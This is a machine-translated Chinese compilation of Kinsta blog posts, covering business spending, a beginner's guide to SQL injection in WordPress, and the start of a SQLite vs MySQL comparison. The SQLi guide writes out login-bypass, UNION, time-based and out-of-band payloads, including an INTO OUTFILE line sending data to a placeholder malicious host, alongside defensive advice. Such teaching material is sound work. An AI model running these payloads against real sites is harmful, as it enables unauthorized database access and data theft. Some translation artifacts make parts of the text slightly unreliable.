Kinsta-博客中文翻译-十三-
Kinsta 博客中文翻译(十三)
原文:Kinsta Blog
你需要花钱来赚钱(原因如下)
企业家总是在寻找削减成本的方法。这可以理解。毕竟,现金是任何企业的命脉,一旦你用完了,你就完了。
然而,节俭和明智地管理你的预算是一回事,当小气鬼甚至在有意义的时候拒绝花钱是另一回事。事实上,当人们认为他们在省钱时,他们实际上是因小失大,损害了他们的生意。
无论你将一个零乘以多少次,所有乘法的总和将永远是零。如果成功是免费的,每个人都会成为百万富翁,对吗?
现实情况是,有时候要赚钱就得花钱。但是你到底应该投资什么来发展你的在线业务呢?让我们来看看。
选择正确的技术组合
托管已经变得非常实惠,几乎到了愚蠢的地步。你每个月花几美元就可以得到它。那么,你为什么要花更多的钱呢?
重要的是要明白,托管质量影响你的网站的性能,两个最重要的指标是速度和正常运行时间。
网站加载速度似乎不是一个重要的问题。这里几秒钟或者那里几秒钟不会有太大的不同,对吗?不对。
Kinsta 把我宠坏了,所以我现在要求每个供应商都提供这样的服务。我们还试图通过我们的 SaaS 工具支持达到这一水平。
事实上,谷歌发现,如果页面加载时间超过 3 秒,53%的移动访问会被放弃。与此同时,他们分析的大多数手机登录页面的加载时间是正常的两倍。
我们的研究令人大开眼界。对于我们分析的 70%的移动登录页面,折叠上方的可视内容显示在屏幕上需要超过 5 秒钟,完全加载折叠上方和下方的所有可视内容需要超过 7 秒钟。–谷歌研究人员
Mobile page speed (Image source: Google)
此外,据 Akamai research 称,网站加载时间延迟 100 毫秒会使转化率下降 7%。客观地说,一次眨眼持续了 100 到 400 毫秒。
很难理解网站加载速度的重要性,因为从理性的角度来看,它真的没有意义。当然,人们不可能如此匆忙,以至于一秒钟(甚至更短)就会让他们放弃这个网站?但是数据很清楚——速度很重要。
当涉及到网站加载速度时,主机是一个主要因素。为了让你的网站快如闪电,你需要一个使用最新技术的主机,比如 Nginx T1、PHP 7、T2 Maria db T3 和 LXD 软件容器。如果没有一个有利于速度的主机架构,你就不能完全优化你的网站。
Technology stack
另一个需要考虑的重要因素是正常运行时间。它是服务器保持运行的时间。简单地说,如果正常运行时间是 99%,这意味着你可以期望你的网站在 99%的时间里保持在线。
正如 Lifewire 的 Jennifer Kyrnin 所展示的那样,即使是运行时间上看似微小的差异,也会累积出大量的时间:
- 98%的正常运行时间= 28.8 分钟/天或 3.4 小时/周或 14.4 小时/月或 7.3 天/年
- 99%的正常运行时间= 14.4 分钟/天或 1.7 小时/周或 7.2 小时/月或 3.65 天/年
- 99.5%的正常运行时间= 7.2 分钟/天或 0.84 小时/周或 3.6 小时/月或 1.83 天/年
- 99.9%的正常运行时间= 1.44 分钟/天或 0.17 小时/周或 0.72 小时/月或 8.8 小时/年
如果你的网站每月收入 1000 美元,那么一个有 98%正常运行时间的主机会使你的利润每月减少 20 美元,或者每年减少 240 美元。这还只是销售损失。如果你的客户或搜索引擎开始认为你的网站不可靠,他们将不再回来,每月 1000 美元将开始下降。詹妮弗
换句话说,停机对业务来说是可怕的。谈到停机时间,最重要的因素是什么?托管。
人们通常没有意识到的是,提供廉价主机服务的公司(像 Hostinger 或 SiteGround 这样做是因为他们提供共享主机服务。这意味着你的网站可能与 200 多个其他网站共享资源。这是一种不稳定的情况,因为你无法控制其他网站上发生的事情。其中一个问题可能会影响网站的性能。
最后,廉价的主机公司根本雇不起足够的技术支持人员,这意味着如果出现问题,他们可能需要一段时间来解决问题。
因此,如果你每月支付 10 美元的托管费,但你得到的是更慢的网站加载速度,更多的停机时间,更不可靠的支持,你真的省钱吗?
或者你是否因为网站的次优表现而损失了金钱?
投资高级应用托管、数据库托管和托管 WordPress 托管将帮助你优化网站速度,最大限度地减少停机时间,并在遇到任何问题时获得可靠的支持。
此外,你不必担心其他问题,如安全漏洞、 DDoS 或 XML-RPC 攻击、或不得不备份你的网站。如果你的网站被入侵,Kinsta 甚至提供免费的黑客补丁。
以独特的设计脱颖而出
有成千上万个免费的 WordPress 主题。
然而,尽管免费主题对业余爱好者来说可能很好,但对企业来说并不理想,原因有三:
- 它们通常没有针对速度进行优化。多余的代码,不必要的页面元素,超大的图片文件…所有这些都会大大降低你网站的速度。您已经知道,即使是很小的加载时间延迟也会影响您的底线。
- 它们不是为转换而优化的。你的网站的目的是销售你的产品,网站上的每一页都应该以引导访问者进入销售漏斗的下一步为目标。
- 大多数时候,它们并不独特。你不希望你的网站看起来像同一个空间里其他网站的翻版。它的设计要和你的品牌一致,帮助你在竞争中脱颖而出。
此外,免费主题在发布前通常没有经过足够彻底的测试,这意味着它们可能有缺陷,不能在所有浏览器上很好地工作,不能在所有设备上很好地工作,等等。
此外,你不能指望通过免费主题获得即时支持,这意味着你必须自己解决所有问题。你真的想花几个小时在 WordPress 论坛上试图解决一些小问题吗?
这就是为什么最好是获得一个优质的 WordPress 主题,它速度快,为转换而优化,可定制,足以让它真正成为你的,并且有可靠的支持。
这里有一些我们推荐的 WordPress 主题。
生成 Press
GeneratePress 是一个快速、轻量级(压缩后不到 1MB)、移动响应的 WordPress 主题,以速度、SEO 和可用性为出发点。由来自加拿大的开发人员 Tom Usborne 构建。它是积极更新和良好的支持。甚至一些 Kinsta 团队成员也在他们的项目中使用 GeneratePress。
虽然有免费版本可用,但您会希望购买高级版本,以利用所有定制功能。
GeneratePress
GeneratePress 最棒的一点是所有的选项都使用了原生的 WordPress 定制器,这意味着你可以在点击发布按钮之前立即看到你所做的每一个修改。这也意味着你不必学习一个新的主题控制面板。
OceanWP
OceanWP 主题是轻量级的和高度可扩展的,它使你能够创建几乎任何类型的网站,如博客、作品集、商业网站和 WooCommerce 店面,并拥有漂亮的专业设计&。由 Nicolas Lecocq 构建,它也在积极更新并得到了很好的支持。
OceanWP 主题
阿斯特拉
Astra 是一个快速的、完全可定制的&美丽主题,适合博客、个人作品集、商业网站和 WooCommerce 店面。它非常轻量级(前端不到 50 KB)并提供无与伦比的速度。由 Brainstorm Force 的团队构建,它得到了积极的更新和良好的支持。你可能认为他们是流行的 All In One Schema Rich Snippets 插件的创造者,这个插件已经存在很多年了。
Astra WordPress theme
然而,如果你能负担得起,那么你可能会考虑在像 Codeable 这样的网站上雇佣一名网页设计师或开发者,并为你的企业定制设计。
Hire WordPress designer/developer
找到一个理解你的愿景并有能力实现它的人可能有点棘手。
寻找过去为类似企业工作过的人(例如,如果你有一个在线商店,寻找一个以前与电子商务公司合作过的设计师,等等。).
此外,确保他们了解设计如何与业务交叉,并能解释他们将如何使用设计来帮助你提高销售额(换句话说,他们应该对转化率优化有扎实的知识)。
起初,投资设计可能看起来有些无聊,但事实并非如此。
毕竟,你的网站设计直接影响着你的访问者的行为,让你的网站在视觉上更加愉悦和易于使用会对你的底线产生巨大的影响。
当我们在 2017 年推出 new Kinsta 网站时,我们与一家有才华的外部机构合作。几年后,这些人现在是 Kinsta 团队的一员。😄我们肯定需要投入更多的资金和时间,但最终还是值得的。
购买合适的工具和软件
你可以找到几乎任何东西的免费应用程序。
然而,重要的是要理解“免费”几乎总是意味着它背后的人不能在更新、开发和支持上花费太多的时间、精力和金钱,这导致了与高级选项相比的次等产品。开发人员和软件创作者和我们一样,也要养家糊口。
以下是我们推荐给你的一些优质产品:
Basecamp 是一款团队沟通和项目管理应用程序,帮助您在与远程团队合作时掌控全局。不再混乱!建议阅读:特雷罗 vs 阿萨纳。
Basecamp
Ahrefs 是一套全方位的搜索引擎优化工具,可以帮助你搜索关键词,建立链接,进行网站审计等等。我们在 Kinsta 使用这个工具,它很容易就能收回成本。事实上,这个工具是我们能够在短短 13 个月内将网站流量增长 571% 的原因之一。
Ahrefs
MailChimp 是一款电子邮件营销应用,你可以用它来建立你的电子邮件列表、发送邮件、设置自动回复序列等等。我们每周在 Kinsta 使用 MailChimp 发布我们的时事通讯。
MailChimp email marketing
Buffer 是一款社交媒体营销自动化软件,通过安排更新和在一个地方管理您的所有帐户,帮助您在 auto-pilot 之后发展您的社交媒体。你从金斯塔营销团队看到的一切都要通过我们的缓冲账户!
注册订阅时事通讯
想知道我们是怎么让流量增长超过 1000%的吗?
加入 20,000 多名获得我们每周时事通讯和内部消息的人的行列吧!
Buffer social media tool
是的,你可以找到所有这些应用的免费替代品,但是免费应用不会像付费应用那样强大。此外,试图用免费应用程序做同样的事情,或者更糟糕的是,手动操作,可能会非常耗时。
投资高级软件可以节省您的时间,让您更有效地完成日常任务,并帮助您更快地发展业务。
如果你能负担得起,就不要犹豫去做。请务必查看我们用于 Kinsta 发展业务的 40+其他 SaaS 应用,以及关于 SaaS 营销的指南。
对集客营销进行长期投资
集客营销就是通过内容吸引人们。
像 SEO ,内容营销,邮件营销等等。因为你正在吸引潜在客户。
然而,现在世界各地的公司都在使用它作为他们的主要营销策略,由于大量的高质量内容,它变得非常有竞争力。
Inbound global methodology (Image source: HubSpot)
这意味着,如果你想建立一个博客、播客或 Youtube 频道,你需要持续不断地制作一流的内容。
你有两个选择:
- 自己动手。如果你已经具备了在你所选择的媒介中脱颖而出的技能,这种方法会很有效。例如,如果你以前有为在线出版物写作的经验,那么你应该能够为你自己的博客写高质量的文章。然而,即使你知道你在做什么,生产高质量的内容也需要很多时间。
- 雇人。如果你没有所需的技能,这是你应该做的。例如,如果你上一次写比电子邮件更有实质内容的东西是你的 SAT 论文,那么你可能要考虑为你的博客雇一个作家。
当然,理论上,你可以从零开始学习你需要的技能,但在实践中,这将非常耗时,因此对于已经有很多责任的人来说是不可行的。
重要的是要明白内容从来都不是免费的。你要么用时间来支付,要么用金钱来支付。当你手头拮据时,前者是有意义的,但如果你负担得起,后者可能是更好的选择。
此外,即使你想自己制作内容,也不要害怕投资让它变得更好。
例如,AppSumo 的创始人诺亚·卡根(Noah Kagan)有一个名为“诺亚·卡根呈现”的播客。
“在发布了我的节目的几集后,我意识到我需要外界的帮助来使我的播客变得更好……我决定请一位专家来‘指导’我如何制作一个好的播客。
因此,他联系了 NPR 制片人尼克·方丹,后者同意给他一些反馈。
看看尼克对诺亚播客“我最有钱的混蛋时刻”的一些观察:
Podcast content (Image source: OkDork)
诺亚说,直到他看到这些评论,他才意识到自己需要多少帮助。
Struggling with downtime and WordPress problems? Kinsta is the hosting solution designed to save you time! Check out our features
一句话:我学到的经验极大地提高了我播客的质量。
从有经验的专业人士那里获得这种帮助可以显著提高你的内容质量。
使用外向营销来补充内向营销
外向营销是关于接触人们。的确,像广告牌、报纸、杂志、广播和电视广告这样的老式方法正在失去效力。
然而,像脸书广告、Instagram 广告和播客广告这样的现代方法可以很好地工作。
但是广告不算集客营销吗?是的,也不是。营销人员会争论像 PPC 这样的东西是内向策略还是外向策略。通常出站意味着它试图打断你的日常工作流程并吸引你的注意力。这就是广告的作用。然而,广告也可以吸引人们使用你的精彩内容。因此,不管战略定义如何,重要的是用外向来补充内向。
例如, MeetEdgar 的创始人劳拉·罗德尔(Laura Roeder)利用脸书的广告让她的创业公司起步。
劳拉在独立黑客播客上接受采访时说,虽然她是内容营销的超级粉丝,但她知道这需要时间来取得成效,这就是为什么她选择在广告推出时专注于广告,每月在脸书广告上花费高达 4 万美元。
我认为人们害怕花钱,但我宁愿一开始在广告上花更多的钱,因为以后,我可以从搜索中获得大部分客户。劳拉
与此同时,鲜花递送初创公司 Bloom & Wild 凭借 Instagram 广告取得了成功。
他们的预算有限,所以他们使用他们的电子邮件列表来创建一个相似的观众,然后向类似于他们的电子邮件订户的人展示他们的广告。
然后,经过一些测试,他们意识到视频广告是最有效的,并决定加倍投入。结果呢?他们的花束订单增加了 62%。
Instagram ad
销售“世界上最舒适的内衣”的 MeUndies 公司利用播客广告来宣传这个词。
他们在世界上一些最受欢迎的播客上为他们的产品做广告,包括“蒂姆·费里斯秀”和“乔·罗根体验”。
广告是获得销售的最直接的方法,因为你把你的产品放在潜在顾客面前。
所以,如果你能想出如何盈利,就不要害怕花钱买广告。
你得到你所支付的
你需要考虑潜在的经济现实。
低端产品几乎总是不如高端产品。为什么?这是因为制造高端产品的公司可以投入更多资源。
例如,正如我们的首席财务官在他的帖子中解释的那样廉价主机如何真正发挥作用,一家提供 10 美元/月主机服务的公司需要 1389 名客户来雇佣一名系统管理员。
但是一个系统管理员,一个可以解决任何出现的疯狂主机问题的系统管理员,怎么能处理近 1400 个客户的技术问题呢?答案是他们不能。汤姆
然后,他鼓励人们设定相应的期望值。
他们应该预料到他们的网站会不时出现故障(因为 10 美元/月,你很可能与太多其他人共享一台服务器),并预计不会很快解决。数字就是这么算出来的。汤姆
这同样适用于其他一切。发布免费 WordPress 主题或免费应用程序的人很可能是把它作为一种爱好。或者他们拥有免费版本的唯一原因是追加销售高级版本。他们可能有工作来支付账单。这严重限制了他们在产品上花费的时间、精力和金钱。他们可能无法与拥有一组全职开发类似软件的人的公司竞争。
现在,这并不是说你不应该使用免费或低端产品。它们可能非常适合个人项目。也有很多很棒的开源项目。
然而,当涉及到商业时,最好警惕这种“便宜货”,因为一旦你考虑到一切(生产力损失、销售损失、增长放缓等),它们很可能一点也不便宜。).
请记住,你会得到你所付出的。
权衡是什么?
显然,在理想的世界里,你会有无限的钱来投资你的事业,并且会得到最好的一切。然而,这不是我们生活的世界,你没有无限的钱来投资你的生意。
这就是为什么当考虑在哪里花费和在哪里削减成本时,理解权衡是重要的。例如,一个便宜的主机会让你花费更少,但会导致更慢的加载速度,更少的正常运行时间,以及修复问题的延迟,这反过来会导致销售的损失。你节省的钱值得吗?
或者,一个免费的应用程序不会花费你什么,但是由于它的限制,完成同样的任务可能要多花 5 个小时,这意味着你可以用于其他工作的时间会少 5 个小时。你节省的钱值得吗?
或者,你可以自己写那篇博文,但是你要花 10 个小时来写,这也意味着你可以花 10 个小时来完成其他任务。你节省的钱值得吗?
最终,这些权衡归结为两件事之一:
- 时间与金钱。你可以花时间省钱,也可以花钱省时间。目前哪种资源短缺?
- 短期收益与长期收益。你可以现在存钱,但长期来看会赔钱,也可以现在花钱,长期来看会省钱。哪个更重要?
这些问题没有对错之分。这完全取决于你的具体情况。只有你知道什么是适合你的生意。
例如,如果你的钱用完了,那么你应该优先考虑短期收益来维持你的生意,即使从长远来看这会伤害你。与此同时,如果你的财务状况稳定,那么你应该优先考虑长期收益,即使它在短期内有点刺痛。
然而,无论你做什么,记住每个决定都有积极和消极的后果,你应该仔细权衡它们。从权衡的角度思考可以帮助你获得一些清晰,因为人们很容易被尽可能削减成本的想法冲昏头脑,以至于忽略了大局。
现实是,有时候你必须花钱才能赚钱。💰 点击推文
摘要
没有人说你应该花你没有的钱。
然而,如果你想让你的企业成长,你需要愿意投资,否则,它将几乎不可能更上一层楼。或者它会比你想象的要花更长的时间。
所以,永远不要让今天节省几美元的冲动成为你事业长期成功的绊脚石。不要怕花钱赚钱。
我们很想听听你对这个话题的看法!请在下面的评论中留下它们。
让你所有的应用程序、数据库和 WordPress 网站在线并在一个屋檐下。我们功能丰富的高性能云平台包括:
- 在 MyKinsta 仪表盘中轻松设置和管理
- 24/7 专家支持
- 最好的谷歌云平台硬件和网络,由 Kubernetes 提供最大的可扩展性
- 面向速度和安全性的企业级 Cloudflare 集成
- 全球受众覆盖全球多达 35 个数据中心和 275 多个 pop
在第一个月使用托管的应用程序或托管的数据库,您可以享受 20 美元的优惠,亲自测试一下。探索我们的计划或与销售人员交谈以找到最适合您的方式。
SQL 注入:WordPress 用户入门指南
SQL(结构化查询语言)是一种允许我们与数据库交互的语言。现代 web 应用程序使用数据库来管理数据并向读者显示动态内容。
SQL 注入(SQLi)是一种对 web 应用程序的攻击,它通过恶意的 SQL 语句危害数据库。
由于这是一种常见的攻击,让我们尝试了解更多关于它是什么,它是如何发生的,以及如何保护自己免受攻击。
准备好了吗?让我们开始吧!
什么是 SQL 注入?
SQL 注入(SQLi)是对 web 应用程序的一种攻击,攻击者可以在 web 应用程序中插入恶意的 SQL 语句,从而有可能访问数据库中的敏感数据或破坏这些数据。SQL 注入是由杰夫·福瑞斯塔在 1998 年首先发现的。
自从被发现以来的二十年里,SQL 注入一直是 web 开发者设计应用程序时的首要任务。
巴克莱银行在 2012 年估计 97%的数据泄露源于 SQL 注入攻击。SQL 注入甚至在今天也很普遍,web 应用程序中注入攻击的严重性得到了广泛的认可。它是 OWASP 的十大最关键的 web 应用安全风险之一。
Kinsta 把我宠坏了,所以我现在要求每个供应商都提供这样的服务。我们还试图通过我们的 SaaS 工具支持达到这一水平。
SQL 注入漏洞是如何工作的?
一个 SQL 注入漏洞使得攻击者能够通过使用恶意的 SQL 语句来完全访问应用程序的数据库。
在本节中,我们将分享一个易受攻击的应用程序的示例。
想象一个典型的 web 应用程序的工作流,它通过用户输入涉及数据库请求。您通过一个表单获取用户输入,比如说一个登录表单。然后,使用用户提交的字段查询数据库,以对用户进行身份验证。对数据库的查询结构如下所示:
select * from user_table
where username = 'sdaityari'
and password = 'mypassword';
为简单起见,我们假设您以明文形式存储密码。然而,给你的密码加盐,然后散列,这是一个好习惯。接下来,如果您从表单中收到了用户名和密码,您可以用 PHP 如下定义查询:
// Connect to SQL database
$db_query = "select * from user_table where
username = '".$user."'
AND password = '".$password."';";
// Execute query
如果有人输入值“admin”;–"在用户名字段中,变量 db _ query 生成的 SQL 查询结果如下:
select * from user_table where
username = 'admin';--' and password = 'mypassword'
这个查询做什么?
SQL 中的注释以双破折号(–)开头。结果查询只按用户名过滤,不考虑密码。如果没有适当的安全措施来避免这种情况,那么只需使用这个技巧就可以授予您对 web 应用程序的管理访问权。
或者,在本例中也可以使用布尔攻击来获取访问权限。如果攻击者输入“密码”或 1 = 1;–"在密码字段中,结果查询如下:
select * from user_table where
username = 'admin' and
password = 'password' or 1=1;--';
在这种情况下,即使您的密码是错误的,您也可以通过验证进入应用程序。如果您的网页显示数据库查询的结果,攻击者可以使用命令 show tables、命令显示数据库中的表,然后根据需要有选择地删除表。
A cartoon on SQL injection (image source: XKCD)
XKCD 的热门漫画《一个母亲的冒险》(Exploits of a Mom)展示了一位母亲与儿子所在学校的对话,在那里她被问及是否真的给儿子取名为“罗伯特”);掉表生;–".
SQL 注入的类型
现在,您已经了解了 SQL 注入漏洞的基本知识,让我们来探究各种类型的 SQL 注入攻击以及每种攻击背后的原因。
带内 SQL 注入
带内 SQL 注入是 SQL 注入最简单的形式。在这个过程中,攻击者能够使用相同的渠道将恶意的 SQL 代码插入到应用程序中,并收集结果。我们将讨论两种形式的带内 SQL 注入攻击:
基于错误的攻击
攻击者在攻击的初始阶段使用基于错误的 SQL 注入技术。基于错误的 SQL 注入背后的想法是获得关于 web 应用程序遵循的数据库结构和表名的进一步信息。例如,错误消息可能包含查询中包含的表名和表的列名。这些数据可用于制造新的攻击。
基于联盟的攻击
在这种方法中,攻击者使用 SQL union join 来显示不同表中的结果。例如,如果攻击者在搜索页面上,他们可能会附加另一个表的结果。
select title, link from post_table
where id < 10
union
select username, password
from user_table; --;
推理 SQL 注入(盲目 SQL 注入)
即使攻击者在 SQL 查询中生成错误,查询的响应也可能不会直接传输到网页。在这种情况下,攻击者需要进一步探查。
在这种形式的 SQL 注入中,攻击者向数据库发送各种查询,以评估应用程序如何分析这些响应。推理 SQL 注入有时也被称为盲 SQL 注入。我们将在下面看到两种推理 SQL 注入:布尔 SQL 注入和基于时间的 SQL 注入。
布尔攻击
如果 SQL 查询导致应用程序内部尚未处理的错误,则生成的网页可能会抛出错误、加载空白页或部分加载。在布尔 SQL 注入中,攻击者通过在输入中尝试两种不同版本的布尔子句来评估用户输入的哪些部分容易受到 SQL 注入的攻击:
- “…并且 1=1”
- “…1 = 2”
如果应用程序在第一种情况下正常工作,但在第二种情况下显示异常,这表明应用程序容易受到 SQL 注入攻击。
基于时间的攻击
基于时间的 SQL 注入攻击还可以帮助攻击者确定 web 应用程序中是否存在漏洞。攻击者利用应用程序使用的数据库管理系统的预定义的基于时间的功能。例如,MySQL 中的,函数 sleep() 指示数据库等待一定的秒数。
select * from comments
WHERE post_id=1-SLEEP(15);
如果这样的查询导致延迟,攻击者将知道它是易受攻击的。
注册订阅时事通讯
想知道我们是怎么让流量增长超过 1000%的吗?
加入 20,000 多名获得我们每周时事通讯和内部消息的人的行列吧!
带外 SQL 注入
如果攻击者无法通过相同的渠道收集 SQL 注入的结果。带外 SQL 注入技术可以用作推理 SQL 注入技术的替代。
通常,这些技术包括将数据库中的数据发送到攻击者选择的恶意位置。这个过程也高度依赖于数据库管理系统的能力。
带外 SQL 注入攻击使用 DBMS 的外部文件处理功能。在 MySQL 中,LOAD_FILE()和 INTO OUTFILE 函数可用于请求 MySQL 将数据传输到外部源。以下是攻击者可能如何使用 OUTFILE 将查询结果发送到外部源:
select * from post_table
into OUTFILE '\\\\MALICIOUS_IP_ADDRESS\location'
类似地,LOAD_FILE()函数可用于从服务器读取文件并显示其内容。可以使用 LOAD_FILE()和 OUTFILE 的组合来读取服务器上的文件内容,然后将其传输到不同的位置。
如何防止 SQL 注入
到目前为止,我们已经研究了 web 应用程序中可能导致 SQL 注入攻击的漏洞。攻击者可以利用 SQL 注入漏洞读取、修改甚至删除数据库的内容。
此外,它还可以让人在服务器内的任何位置读取文件,并将内容传输到其他地方。在本节中,我们将探讨各种技术来保护您的 web 应用程序和网站免受 SQL 注入攻击。
转义用户输入
一般来说,判断一个用户字符串是否是恶意的是一件困难的事情。因此,最好的方法是对用户输入中的特殊字符进行转义。
这个过程使你免受 SQL 注入的攻击。在使用mysql_escape_string() function在 PHP 中构建查询之前,您可以转义一个字符串。还可以使用mysqli_real_escape_string()函数对 MySQL 中的字符串进行转义。
将输出显示为 HTML 时,您还需要转换字符串,以确保特殊字符不会干扰 HTML 标记。您可以使用函数htmlspecialchars()转换 PHP 中的特殊字符。
使用准备好的语句
或者,您可以使用准备好的语句来避免 SQL 注入。预准备语句是 SQL 查询的模板,您可以在稍后阶段指定参数来执行它。下面是一个用 PHP 和 MySQLi 编写的语句的例子。
$query = $mysql_connection->prepare("select * from user_table where username = ? and password = ?");
$query->execute(array($username, $password));
防止 SQL 攻击的其他安全检查
减轻该漏洞的下一步是将对数据库的访问限制在必要的范围内。
与宕机和 WordPress 问题做斗争?Kinsta 是一款考虑到性能和安全性的托管解决方案!查看我们的计划
例如,使用只能访问相关数据库的特定用户将 web 应用程序连接到 DBMS。
限制数据库用户对服务器所有其他位置的访问。您可能还希望通过 web 服务器阻止 URL 中的某些 SQL 关键字。如果您使用 Apache 作为 web 服务器,您可以在您的中使用下面几行代码。htaccess 文件向潜在的攻击者显示 403 禁止错误。
在使用这种技术之前应该小心,因为如果 URL 包含这些关键字,Apache 会向读者显示一个错误。
RewriteCond %{QUERY_STRING} [^a-z](declare¦char¦set¦cast¦convert¦delete¦drop¦exec¦insert¦meta¦script¦select¦truncate¦update)[^a-z] [NC]
RewriteRule (.*) - [F]
信息
Kinsta 在 Nginx web 服务器上运行 WordPress,该服务器不支持. htaccess 文件。如果你想设置一个规则来阻止你的 URL 上的关键词,请联系 Kinsta 支持团队,他们将能够提供帮助。
作为额外的预防提示,您应该始终使用更新软件。当发布新版本或补丁时,更新中修复的错误会在发行说明中详细说明。一旦漏洞的细节公之于众,运行任何软件的旧版本都是有风险的。
WordPress 中的 SQL 注入
如果你使用最新的 WordPress 核心文件,你就不会受到任何 SQL 注入漏洞的攻击。然而,当你使用第三方主题和插件时,你的整个应用程序就有风险了。
你的 WordPress 网站的强度取决于它最薄弱的环节。在这一节中,我们将探讨减少 WordPress 中 SQL 注入漏洞的关键考虑因素,以及如何在您现有的 WordPress 站点上执行漏洞检查。
WordPress 的 SQL 注入漏洞防护
为了减少 SQL 注入在你的 WordPress 主题或插件中的漏洞,你必须遵循的唯一规则是在与数据库交互时总是使用 T2 现有的 WordPress 函数。
在 WordPress 的开发过程中,这些函数都经过了彻底的 SQL 注入漏洞测试。例如,如果你想给一篇文章添加评论,使用函数 wp_insert_comment()而不是直接将数据插入 wp_comments 表。
虽然函数是可扩展的,但您可能偶尔需要运行复杂的查询。在这种情况下,确保使用了函数组$ WP _ db。在创建查询之前,可以使用$wpdb->prepare()来转义用户输入。
此外,这里是 WordPress 中整理数据的函数列表。这些帮助你避开特定类型的用户输入,如电子邮件和网址。
保护你的 WordPress 站点
虽然 WordPress 本身是安全的,但是过时的核心软件和被清空的插件会导致漏洞。尽管除了彻底检查你的 WordPress 站点的 SQL 注入漏洞之外别无选择,但是网站的复杂性可能会使这项任务变得具有挑战性。
您可以使用在线扫描工具,如 ThreatPass 和 WPScan 漏洞数据库。您可以审核您的插件,看看它们的开发是否停滞了。如果它们被抛弃了一段时间,在你的网站上使用它们可能不是一个好主意。
如果您仍然绝对需要使用它们,请确保您彻底测试了它们的代码和功能是否存在漏洞。除此之外,请确保您遵循以下卫生检查:
- 更新 PHP、WordPress core 和 MySQL
- 更新第三方插件和主题
- 避免使用 root 用户连接 SQL 数据库
- 限制 SQL 用户对敏感目录的访问
- 使用您的服务器阻止 SQL 关键字
- 将您的站点备份保存在异地,以防不可逆转的损坏
这里有一篇关于 WordPress 安全的详细帖子和一份详尽的检查清单。此外,你可能希望投资这些用于 WordPress 的顶级安全插件。如果尽管你尽了最大努力,你的 WordPress 网站还是被黑了,你应该这么做。
信息
Kinsta 向其所有计划的所有客户提供了一份恶意软件安全保证书。
SQL 注入违法吗?
肯定的,是的!即使存在实际的漏洞,攻击者仍然试图访问他们在其他情况下无法获得的数据。
想象一下有人把钥匙留在车里的场景。开着它离开,仅仅因为它开着没人看管就构成犯罪吗?《SQLi 法》在不同国家适用不同的法律。它属于美国的计算机欺诈和滥用法案(1986),以及英国的计算机滥用法案(1990)。
摘要
SQL 注入漏洞很久以前就被发现了。然而,2018 年一份关于被黑网站的报告表明,SQLi 是继 XSS 攻击后 WordPress 最常见的网站黑客。为了防止这种情况发生,您应该:
- 了解 SQL 注入漏洞的工作原理
- 探究攻击者可能使用 SQLi 对您的 web 应用程序进行未经授权的访问的各种方式
- 实现一些方法来保护你的网站免受 SQLi 攻击,比如逃避用户输入和使用准备好的语句
- 遵循安全检查程序
古语有云:“宁为玉碎,不为瓦全!”
让你所有的应用程序、数据库和 WordPress 网站在线并在一个屋檐下。我们功能丰富的高性能云平台包括:
- 在 MyKinsta 仪表盘中轻松设置和管理
- 24/7 专家支持
- 最好的谷歌云平台硬件和网络,由 Kubernetes 提供最大的可扩展性
- 面向速度和安全性的企业级 Cloudflare 集成
- 全球受众覆盖全球多达 35 个数据中心和 275 多个 pop
在第一个月使用托管的应用程序或托管的数据库,您可以享受 20 美元的优惠,亲自测试一下。探索我们的计划或与销售人员交谈以找到最适合您的方式。
了解数据库技术:SQLite 与 MySQL
数据库已经成为几乎所有可以想象的应用程序必不可少的后端存储工具。如果您的应用程序包含需要访问的数据,您将需要一个数据库来快速存储和检索它。
数据库管理系统(DBMS)是设计用来使用、检索和定义规则以验证和操作数据库中的数据的软件。DBMS 有很多种类型:关系型、面向对象型、层次型和基于网络的。
选择合适的 DBMS 对于应用程序的成功和速度至关重要。由于有许多开源 DBMSs 可用,包括 MySQL 、 MariaDB 、 SQLite 、 PostgreSQL 和 Neo4j ,为您的项目选择最合适的数据库可能具有挑战性。
让我们比较两个最流行的开源管理系统——MySQL 和 SQLite——详细说明它们是如何工作的,它们的根本区别,优缺点,最后,哪一个更适合 WordPress 托管的 web 应用程序。
使用开源数据库的好处
虽然有许多专有的 DBMS 选项,但是开源数据库已经被证明是最受欢迎的。它们的主要好处包括:
- 数据库信息不会与其他人共享,这提供了安全优势。
- 降低扩展成本,以支持更高数量的数据或请求
- 一些开源数据库在可用资源的基础上运行,使它们更灵活地满足应用程序的需求。
什么是 SQLite?
如前所述,DBMSes 由四种主要类型组成。这些类型中的大多数以分层模型处理数据,以树状结构组织,并通过链接连接。
SQLite 是一个开源的关系数据库管理系统(RDBMS)。RDBMS将数据存储在多个二维表中,而不是一个大表中。每个表都由包含唯一值(称为键)的行组成,键用于关联表。这就是这些 DBMSes 被称为关系型的原因。
RDBMS 中有两种类型的键:主键和外键。主键是标识每个数据库行的唯一值,而您可以使用外键来引用其他表。例如,假设您有一个公司雇员的数据库。没有必要将部门名称添加到雇员表中。相反,您可以在 employee 表中添加一个引用(外键)到 department 的列。该外键引用“department”表中的特定行。
顾名思义,SQLite 在设置、管理和存储方面是轻量级的。
大多数数据库需要一个服务器进程,但是 SQLite 是无服务器的,这意味着应用程序可以直接读写数据,而不需要客户端-服务器架构。此外,无服务器 SQLite 不需要安装或配置,因此它是独立的,对操作系统的依赖性更小。
这些特性使得 SQLite 适用于物联网( IoT )、嵌入式应用和桌面应用。
什么是 MySQL?
快速、可靠且易于学习,大多数应用程序使用 MySQL 作为他们的首选 DBMS。
与 SQLite 不同,MySQL 遵循客户机-服务器架构,需要一个服务器来运行。服务器使用结构化查询语言(SQL)处理检索、操作和添加数据等命令。
MySQL 还带有一个内置的图形用户界面(GUI ),称为 MySQL Workbench,用于访问数据。它还提供了一个名为 mysqladmin 的命令行界面(CLI)来管理可用数据。
此外,MySQL 是独立于平台的,这意味着它可以在任何操作系统上运行,并兼容不同的编程语言,如 Python、Java 和 C++。
成为最受欢迎的 DBMS 还有另一个优势:它的社区。互联网上有数百万的教程可以帮助你学习 MySQL,你几乎可以在网上找到任何问题的答案。由于 Oracle 维护 MySQL,您可以在 MySQL 网站上找到教程、证书和支持。你也可以在我们的博客上阅读更多关于 MySQL 的内容。
SQLite 与 MySQL:用例分解
虽然 MySQL 和 SQLite 都是开源 RDBMSes,但它们有非常不同的架构和用例。
体系结构
MySQL 遵循多层的服务器-客户端架构,由客户端、服务器和存储组成。客户端层使用 GUI 或 CLI 处理用户查询和命令。服务器层处理命令的逻辑,为每个请求创建一个新线程。最后,存储层负责存储数据表。
相比之下,SQLite 是一个无服务器的 DBMS,它将 SQL 编译成字节码,然后使用虚拟机执行。后端以 B 树实现的方式将表存储在磁盘上。
数据类型
